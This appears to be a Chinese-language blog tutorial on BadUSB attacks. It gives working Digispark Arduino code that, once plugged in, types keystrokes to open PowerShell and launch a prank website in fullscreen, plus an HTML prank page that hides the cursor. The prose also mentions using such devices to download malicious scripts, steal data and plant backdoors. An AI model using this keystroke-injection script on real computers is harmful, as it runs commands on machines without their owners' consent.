本文仅供学习和研究目的,请勿用于非法用途。未经授权使用Bad USB可能违反法律。
BadUSB
Bad USB是一种利用USB设备进行的计算机安全攻击,它可以通过修改USB设备的固件,让其模拟键盘、鼠标等人机交互设备,从而在插入目标电脑后执行恶意代码。
Bad USB的攻击难以被杀毒软件检测和防御,因为它直接作用于USB控制器,而不是USB存储空间。Bad USB的攻击方法首次在2014年的黑帽大会上被安全研究人员展示,引起了广泛的关注和讨论。
制作Bad USB设备的步骤
要制作一个Bad USB设备,需要以下几个步骤:
准备一个可编程的USB设备,如Arduino开发板或TEENSY芯片。本文使用Attiny85开发板Digispark。
使用Arduino IDE或其他工具,编写并上传一段能够模拟键盘输入的代码,如打开命令行窗口,下载并运行恶意脚本等。
将USB设备插入目标电脑,等待代码自动执行,完成攻击。
Bad USB的攻击方式非常隐蔽和危险,因为它可以利用用户对USB设备的信任,轻易地窃取信息、植入后门、传播病毒等。
上代码
Digispark.ino1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| #include "DigiKeyboard.h"
void setup() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("POWERSHELL");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("Start-Process -FilePath 你的恶搞网站");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_F11);
}
void loop() {
}
|
感兴趣的话你可以自己试试
PS:提供一份html模板,用于恶搞
Digispark.html1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| <!DOCTYPE html>
<html>
<head>
<style>
body {
background: #000 no-repeat center center fixed;
margin: 0;
cursor: none;
}
.d1 {
width: 550px;
margin: 0px auto;
}
.d2 {
position: absolute;
top: 50%;
width: 550px;
margin-top: -5%;
}
</style>
</head>
<body>
<div class="d1">
<div class="d2">
<center>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGwAAABvCAYAAAAJ8iVjAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAAIGNIUk0AAHolAACAgwAA+f8AAIDpAAB1MAAA6mAAADqYAAAXb5JfxUYAAAZoSURBVHja7J1pbFVFFMd/bUFaKlqKtpRgrLg0hFBRFEXjggTQmCgqasRdjIkmxmAMUfjgEnEnIolL5AOgwRWKGkA0KIpiDC5URGoQ2YIKWKiipdgCxw9nDClq23vfu8vcmX/ykpf33n0z9/7umeXcmXMKRAQve1ToL4EH5uWBeXlgHpiXB+blgdmubo6ff2/gNGAw8BfwbNorXODgxLkEuAK4ChgGVJrP64FTvIWlC9TNwF3ASf/xfRFQAIgHlrzOAWYAQzr4TXPaYbky6HgIWN4JLIDNftCRrMqAV4ELu/j77z2w5NQHWGCawq6qwc/DklF3YE5AWHuBVR5YMnoUuDjgMSuAdR5Y/BoF3B3iuNm2nGCWJs4lwBfAoIDH/QTUAru8hcWrCSFgATxjC6wsWdiRwJfACQGPa0B9iXtsOdGsWNioELAA7rMJVpaAXReyKXzbthPNQpPYF/gOKA9wzLvApUCbbSebBQsbHhDWJ8D1NsLKCrCaEJa109aTzQKwqi78Zh8wzcBqsvlks+D8PaKT7+tR78eyLIyusuqtPwB8BjwNvGMsDA8sHaoHVpt+aSP6sHIl6szdn7U7MQ3D+hKgGF1T0Qr8aSwkSh0GVADVZlpQBPwG7AC2o66qvd7CdJBTC4xEn1cdY4bkJea7VnPhNgMfAu+ZOVY+7qpq4CL00UuNGayUHvIbAf4AGk0dPjVN6qq0WGtcFtYfuAEYCwwNMDrdZ5q3xejj/g0By+2NLmm7DDgf6Bmi7oL6Kd8AZiU9JYgaWAW6rOwOdI1FLtpj7va5xvr2dGDFw4ErgfHA0Xk8n5+Bx4GZQEvWgI1Dl5ZVRfDfPwLzgEXAFmOJFcAIA2loxNfta+AW4JssACsGnkMXbcahFtO/lKILQeNSK3Abun7EWmCVQB1wFu5oMrqOxDpg/czg4GTc0yTgSZuAlRtYZ+Cm9gNXA/NtAfaaqbDL2mFal21RT2Rz1T0eFm3A83HM0XK1sCHoA8HDHYa1DbjWzA0jV66uqYcdh7Ue9aKssWGUOAZY4jCsrcBoYt5EkUsfdq/DsJpR11fsO17CAhsKnOswsInA50kUHBbYTbgbMmI+6vxNRGH6sDLgW/SRiWtqAs4kwa1JYayk1lFYGMtKdB9ZGGBnOzzQmJV0JcIAG+kosIWkYON6UGClhNslkgUtSEMlggI7Hl0445ra0OV01gE71tHhfAPqhrIOWKWjzeEPpGSZmwfWNW1PS0WCAit3FFiTrcB6OApsn63AXI1gWmorsDZHgZXZCmyvo8CqbAW2y1FgNegOG+uA/eoosAHAiTYCa3QUWCGdh6BNJbBfcFeX2whsIxbHuMhRY9CEBNb1YVsdBVZMfFuo8gZMSInXOiHdCgy0CRjoRm1X1Qt4zDZgq3FblwB32gRsPbogxWU9AVxgC7AtwFeOAysGXgdOtwEYwEd4HYVGMTjPBmALPS9AY4AsMaPHVANbg8bK8NLmcSbwJjF49cMCa0HjQHkd1Dg0JtVk01ymChho7CWv9qoEpqL7vlMH7GM0aJbXv7UijcBAg3V5tdc6YGlagc1B4xt6HdRcIoz0liuwLb4va6c2NMocaQUG8BIWZGeNSW8Ba9MObAUawc11CTA9rfOwQzXD82IpGnrdCmDLScmGtwQ1NY5C8hkvcTCa0tDF9fd1aDBobLEw0FAQLzoIqxl4IK7C8r2b8kHccwpPNzdrLIoiSPN4M3l0QavREE6/22phAK9gUV7kHIfxE+OEFRUw0EhvWV8O9xQxBbWMukn8R6PJ7jOzVWhEoNizQ0QZwuF94P4MwtqNJvlOJJVH1DE3HkHzTmZJU4yFJaI4shtVog87azIA6wXg9iQrEFc6qlrTn/W1GNYidMtRqwvAAE41/VqfPP7nATSjX4t53w3d8d8zz3VfhuY+2530XRN3SsVa1Ek8IIf/2ISmpP/AvN+Juof2o6kSe5lmeJC5yCPMZ2FVB9xobowUzP5E4n71F5FFEkytIjJPRMaKSEnA8qpFZJKINAQss1lEpohIUQLX6H9fSRVcKCITRGRtJxetQUSmicjAPJRZLCLXiMhiEWnqoMxGEXk5T2Xm/ZV0ltkepskahiYV7Y4mndlkhs4rI+rk+5kyj0PzZBYZF9MGNDVJaoKBJd2HeaV84uzlgXlgXh6Ylwfm5YF5YF4emJcHZrX+HgAvGBAbRFkAJQAAAABJRU5ErkJggg==" >
<br><br><br>
<img src="data:image/gif;base64,R0lGODlh2wANAMQXAKWlpeDg4Pz8/IaGhkxMTPj4+E9PT8HBwTAwMBEREUVFRfX19aKioi0tLYODgxUVFSkpKefn59LS0goKCgAAAA4ODv///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh/wtYTVAgRGF0YVhNUDw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBXaW5kb3dzIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOkFBM0UzNjgyRjcyQzExRTc5NTI2RDM3NkE1RTAyN0M5IiB4bXBNTTpEb2N1bWVudElEPSJ4bXAuZGlkOkFBM0UzNjgzRjcyQzExRTc5NTI2RDM3NkE1RTAyN0M5Ij4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QUEzRTM2ODBGNzJDMTFFNzk1MjZEMzc2QTVFMDI3QzkiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QUEzRTM2ODFGNzJDMTFFNzk1MjZEMzc2QTVFMDI3QzkiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+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" >
</center>
</div>
</div>
</body>
</html>
|
